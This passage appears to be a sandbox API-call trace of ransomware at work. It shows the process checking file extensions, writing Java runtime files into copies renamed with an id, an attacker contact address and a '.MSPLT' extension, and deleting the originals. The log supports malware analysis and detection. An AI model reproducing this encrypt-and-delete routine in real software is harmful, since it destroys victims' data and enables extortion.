Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.992] lstrlenW (lpString=".zip") returned 4 [0313.992] lstrcmpiW (lpString1=".zip", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString=".rar") returned 4 [0313.992] lstrcmpiW (lpString1=".rar", lpString2=".jar") returned 1 [0313.992] lstrlenW (lpString=".bz2") returned 4 [0313.993] lstrcmpiW (lpString1=".bz2", lpString2=".jar") returned -1 [0313.993] lstrlenW (lpString=".7z") returned 3 [0313.993] lstrcmpiW (lpString1=".7z", lpString2="jar") returned -1 [0313.993] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.993] lstrlenW (lpString=".dbf") returned 4 [0313.993] lstrcmpiW (lpString1=".dbf", lpString2=".jar") returned -1 [0313.993] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.993] lstrlenW (lpString=".1cd") returned 4 [0313.993] lstrcmpiW (lpString1=".1cd", lpString2=".jar") returned -1 [0313.993] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jfr.jar") returned 46 [0313.993] lstrlenW (lpString=".jpg") returned 4 [0313.993] lstrcmpiW (lpString1=".jpg", lpString2=".jar") returned 1 [0313.993] lstrcmpiW (lpString1=".template", lpString2=".MSPLT") returned 1 [0313.993] lstrlenW (lpString="jmxremote.password.template") returned 27 [0313.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.129] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=2856) returned 1 [0314.130] CloseHandle (hObject=0x3b0) returned 1 [0314.130] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template")) returned 0x20 [0314.132] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.132] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.133] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.133] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.133] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0314.136] GetLastError () returned 0x0 [0314.137] ReadFile (in: hFile=0x3b0, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0xb28, lpOverlapped=0x0) returned 1 [0314.139] WriteFile (in: hFile=0x52c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xb30, lpOverlapped=0x0) returned 1 [0314.140] ReadFile (in: hFile=0x3b0, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.140] WriteFile (in: hFile=0x52c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x10a, lpOverlapped=0x0) returned 1 [0314.140] SetEndOfFile (hFile=0x52c) returned 1 [0314.140] CloseHandle (hObject=0x52c) returned 1 [0314.141] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.141] SetEndOfFile (hFile=0x3b0) returned 1 [0314.144] CloseHandle (hObject=0x3b0) returned 1 [0314.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.151] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template")) returned 1 [0314.152] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.153] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.153] lstrlenW (lpString=".doc") returned 4 [0314.153] lstrcmpiW (lpString1=".doc", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".docx") returned 5 [0314.153] lstrcmpiW (lpString1=".docx", lpString2="plate") returned -1 [0314.153] lstrlenW (lpString=".pdf") returned 4 [0314.153] lstrcmpiW (lpString1=".pdf", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".xls") returned 4 [0314.153] lstrcmpiW (lpString1=".xls", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".xlsx") returned 5 [0314.153] lstrcmpiW (lpString1=".xlsx", lpString2="plate") returned -1 [0314.153] lstrlenW (lpString=".ppt") returned 4 [0314.153] lstrcmpiW (lpString1=".ppt", lpString2="late") returned -1 [0314.153] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.153] lstrlenW (lpString=".zip") returned 4 [0314.153] lstrcmpiW (lpString1=".zip", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".rar") returned 4 [0314.153] lstrcmpiW (lpString1=".rar", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".bz2") returned 4 [0314.153] lstrcmpiW (lpString1=".bz2", lpString2="late") returned -1 [0314.153] lstrlenW (lpString=".7z") returned 3 [0314.153] lstrcmpiW (lpString1=".7z", lpString2="ate") returned -1 [0314.153] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.153] lstrlenW (lpString=".dbf") returned 4 [0314.154] lstrcmpiW (lpString1=".dbf", lpString2="late") returned -1 [0314.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.154] lstrlenW (lpString=".1cd") returned 4 [0314.154] lstrcmpiW (lpString1=".1cd", lpString2="late") returned -1 [0314.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.154] lstrlenW (lpString=".jpg") returned 4 [0314.154] lstrcmpiW (lpString1=".jpg", lpString2="late") returned -1 [0314.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.154] lstrlenW (lpString=".doc") returned 4 [0314.154] lstrcmpiW (lpString1=".doc", lpString2="late") returned -1 [0314.154] lstrlenW (lpString=".docx") returned 5 [0314.154] lstrcmpiW (lpString1=".docx", lpString2="plate") returned -1 [0314.154] lstrlenW (lpString=".pdf") returned 4 [0314.154] lstrcmpiW (lpString1=".pdf", lpString2="late") returned -1 [0314.154] lstrlenW (lpString=".xls") returned 4 [0314.154] lstrcmpiW (lpString1=".xls", lpString2="late") returned -1 [0314.154] lstrlenW (lpString=".xlsx") returned 5 [0314.154] lstrcmpiW (lpString1=".xlsx", lpString2="plate") returned -1 [0314.154] lstrlenW (lpString=".ppt") returned 4 [0314.154] lstrcmpiW (lpString1=".ppt", lpString2="late") returned -1 [0314.154] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.154] lstrlenW (lpString=".zip") returned 4 [0314.154] lstrcmpiW (lpString1=".zip", lpString2="late") returned -1 [0314.154] lstrlenW (lpString=".rar") returned 4 [0314.154] lstrcmpiW (lpString1=".rar", lpString2="late") returned -1 [0314.154] lstrlenW (lpString=".bz2") returned 4 [0314.154] lstrcmpiW (lpString1=".bz2", lpString2="late") returned -1 [0314.155] lstrlenW (lpString=".7z") returned 3 [0314.155] lstrcmpiW (lpString1=".7z", lpString2="ate") returned -1 [0314.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.155] lstrlenW (lpString=".dbf") returned 4 [0314.155] lstrcmpiW (lpString1=".dbf", lpString2="late") returned -1 [0314.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.155] lstrlenW (lpString=".1cd") returned 4 [0314.155] lstrcmpiW (lpString1=".1cd", lpString2="late") returned -1 [0314.155] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\management\\jmxremote.password.template") returned 77 [0314.155] lstrlenW (lpString=".jpg") returned 4 [0314.155] lstrcmpiW (lpString1=".jpg", lpString2="late") returned -1 [0314.155] lstrcmpiW (lpString1=".properties", lpString2=".MSPLT") returned 1 [0314.155] lstrlenW (lpString="net.properties") returned 14 [0314.155] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.156] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=4464) returned 1 [0314.156] CloseHandle (hObject=0x3b0) returned 1 [0314.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties")) returned 0x20 [0314.156] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.156] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0 [0314.157] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.157] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.157] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x52c [0314.157] GetLastError () returned 0x0 [0314.157] ReadFile (in: hFile=0x3b0, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x1170, lpOverlapped=0x0) returned 1 [0314.159] WriteFile (in: hFile=0x52c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x1180, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x1180, lpOverlapped=0x0) returned 1 [0314.161] ReadFile (in: hFile=0x3b0, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.161] WriteFile (in: hFile=0x52c, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xf0, lpOverlapped=0x0) returned 1 [0314.162] SetEndOfFile (hFile=0x52c) returned 1 [0314.162] CloseHandle (hObject=0x52c) returned 1 [0314.162] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.162] SetEndOfFile (hFile=0x3b0) returned 1 [0314.181] CloseHandle (hObject=0x3b0) returned 1 [0314.181] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.640] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties")) returned 1 [0314.653] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.653] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.653] lstrlenW (lpString=".doc") returned 4 [0314.653] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.653] lstrlenW (lpString=".docx") returned 5 [0314.653] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.653] lstrlenW (lpString=".pdf") returned 4 [0314.653] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.653] lstrlenW (lpString=".xls") returned 4 [0314.653] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString=".xlsx") returned 5 [0314.654] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.654] lstrlenW (lpString=".ppt") returned 4 [0314.654] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.654] lstrlenW (lpString=".zip") returned 4 [0314.654] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString=".rar") returned 4 [0314.654] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString=".bz2") returned 4 [0314.654] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString=".7z") returned 3 [0314.654] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.654] lstrlenW (lpString=".dbf") returned 4 [0314.654] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.654] lstrlenW (lpString=".1cd") returned 4 [0314.654] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.654] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.655] lstrlenW (lpString=".jpg") returned 4 [0314.655] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.655] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.655] lstrlenW (lpString=".doc") returned 4 [0314.655] lstrcmpiW (lpString1=".doc", lpString2="ties") returned -1 [0314.655] lstrlenW (lpString=".docx") returned 5 [0314.655] lstrcmpiW (lpString1=".docx", lpString2="rties") returned -1 [0314.655] lstrlenW (lpString=".pdf") returned 4 [0314.655] lstrcmpiW (lpString1=".pdf", lpString2="ties") returned -1 [0314.655] lstrlenW (lpString=".xls") returned 4 [0314.655] lstrcmpiW (lpString1=".xls", lpString2="ties") returned -1 [0314.655] lstrlenW (lpString=".xlsx") returned 5 [0314.655] lstrcmpiW (lpString1=".xlsx", lpString2="rties") returned -1 [0314.655] lstrlenW (lpString=".ppt") returned 4 [0314.655] lstrcmpiW (lpString1=".ppt", lpString2="ties") returned -1 [0314.656] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.656] lstrlenW (lpString=".zip") returned 4 [0314.656] lstrcmpiW (lpString1=".zip", lpString2="ties") returned -1 [0314.656] lstrlenW (lpString=".rar") returned 4 [0314.656] lstrcmpiW (lpString1=".rar", lpString2="ties") returned -1 [0314.656] lstrlenW (lpString=".bz2") returned 4 [0314.656] lstrcmpiW (lpString1=".bz2", lpString2="ties") returned -1 [0314.656] lstrlenW (lpString=".7z") returned 3 [0314.656] lstrcmpiW (lpString1=".7z", lpString2="ies") returned -1 [0314.656] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.656] lstrlenW (lpString=".dbf") returned 4 [0314.656] lstrcmpiW (lpString1=".dbf", lpString2="ties") returned -1 [0314.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.657] lstrlenW (lpString=".1cd") returned 4 [0314.657] lstrcmpiW (lpString1=".1cd", lpString2="ties") returned -1 [0314.657] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 53 [0314.657] lstrlenW (lpString=".jpg") returned 4 [0314.657] lstrcmpiW (lpString1=".jpg", lpString2="ties") returned -1 [0314.657] lstrcmpiW (lpString1=".policy", lpString2=".MSPLT") returned 1 [0314.657] lstrlenW (lpString="java.policy") returned 11 [0314.657] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x51c [0314.659] GetFileSizeEx (in: hFile=0x51c, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=2466) returned 1 [0314.659] CloseHandle (hObject=0x51c) returned 1 [0314.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy")) returned 0x20 [0314.659] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0314.666] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0314.666] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.667] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.667] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e4 [0314.671] GetLastError () returned 0x0 [0314.671] ReadFile (in: hFile=0x470, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x9a2, lpOverlapped=0x0) returned 1 [0314.708] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0x9b0, lpOverlapped=0x0) returned 1 [0314.710] ReadFile (in: hFile=0x470, lpBuffer=0x3db7020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x349fecc, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesRead=0x349fecc*=0x0, lpOverlapped=0x0) returned 1 [0314.710] WriteFile (in: hFile=0x3e4, lpBuffer=0x3db7020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x349fc94, lpOverlapped=0x0 | out: lpBuffer=0x3db7020*, lpNumberOfBytesWritten=0x349fc94*=0xea, lpOverlapped=0x0) returned 1 [0314.710] SetEndOfFile (hFile=0x3e4) returned 1 [0314.710] CloseHandle (hObject=0x3e4) returned 1 [0314.710] SetFilePointerEx (in: hFile=0x470, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x349fec0 | out: lpNewFilePointer=0x0) returned 1 [0314.711] SetEndOfFile (hFile=0x470) returned 1 [0314.722] CloseHandle (hObject=0x470) returned 1 [0314.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0314.722] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\java.policy")) returned 1 [0314.723] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.723] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.724] lstrlenW (lpString=".doc") returned 4 [0314.724] lstrcmpiW (lpString1=".doc", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".docx") returned 5 [0314.724] lstrcmpiW (lpString1=".docx", lpString2="olicy") returned -1 [0314.724] lstrlenW (lpString=".pdf") returned 4 [0314.724] lstrcmpiW (lpString1=".pdf", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".xls") returned 4 [0314.724] lstrcmpiW (lpString1=".xls", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".xlsx") returned 5 [0314.724] lstrcmpiW (lpString1=".xlsx", lpString2="olicy") returned -1 [0314.724] lstrlenW (lpString=".ppt") returned 4 [0314.724] lstrcmpiW (lpString1=".ppt", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.724] lstrlenW (lpString=".zip") returned 4 [0314.724] lstrcmpiW (lpString1=".zip", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".rar") returned 4 [0314.724] lstrcmpiW (lpString1=".rar", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".bz2") returned 4 [0314.724] lstrcmpiW (lpString1=".bz2", lpString2="licy") returned -1 [0314.724] lstrlenW (lpString=".7z") returned 3 [0314.724] lstrcmpiW (lpString1=".7z", lpString2="icy") returned -1 [0314.724] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.724] lstrlenW (lpString=".dbf") returned 4 [0314.724] lstrcmpiW (lpString1=".dbf", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.725] lstrlenW (lpString=".1cd") returned 4 [0314.725] lstrcmpiW (lpString1=".1cd", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.725] lstrlenW (lpString=".jpg") returned 4 [0314.725] lstrcmpiW (lpString1=".jpg", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.725] lstrlenW (lpString=".doc") returned 4 [0314.725] lstrcmpiW (lpString1=".doc", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString=".docx") returned 5 [0314.725] lstrcmpiW (lpString1=".docx", lpString2="olicy") returned -1 [0314.725] lstrlenW (lpString=".pdf") returned 4 [0314.725] lstrcmpiW (lpString1=".pdf", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString=".xls") returned 4 [0314.725] lstrcmpiW (lpString1=".xls", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString=".xlsx") returned 5 [0314.725] lstrcmpiW (lpString1=".xlsx", lpString2="olicy") returned -1 [0314.725] lstrlenW (lpString=".ppt") returned 4 [0314.725] lstrcmpiW (lpString1=".ppt", lpString2="licy") returned -1 [0314.725] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.725] lstrlenW (lpString=".zip") returned 4 [0314.725] lstrcmpiW (lpString1=".zip", lpString2="licy") returned -1 [0314.726] lstrlenW (lpString=".rar") returned 4 [0314.726] lstrcmpiW (lpString1=".rar", lpString2="licy") returned -1 [0314.726] lstrlenW (lpString=".bz2") returned 4 [0314.726] lstrcmpiW (lpString1=".bz2", lpString2="licy") returned -1 [0314.726] lstrlenW (lpString=".7z") returned 3 [0314.726] lstrcmpiW (lpString1=".7z", lpString2="icy") returned -1 [0314.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.726] lstrlenW (lpString=".dbf") returned 4 [0314.726] lstrcmpiW (lpString1=".dbf", lpString2="licy") returned -1 [0314.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.726] lstrlenW (lpString=".1cd") returned 4 [0314.726] lstrcmpiW (lpString1=".1cd", lpString2="licy") returned -1 [0314.726] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\java.policy") returned 59 [0314.726] lstrlenW (lpString=".jpg") returned 4 [0314.726] lstrcmpiW (lpString1=".jpg", lpString2="licy") returned -1 [0314.726] lstrcmpiW (lpString1=".policy", lpString2=".MSPLT") returned 1 [0314.726] lstrlenW (lpString="javaws.policy") returned 13 [0314.726] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\security\\javaws.policy" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\security\\javaws.policy"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0314.727] GetFileSizeEx (in: hFile=0x470, lpFileSize=0x349ff14 | out: lpFileSize=0x349ff14*=98) returned 1 [0314.727] CloseHandle (hObject=0x470) returned 1 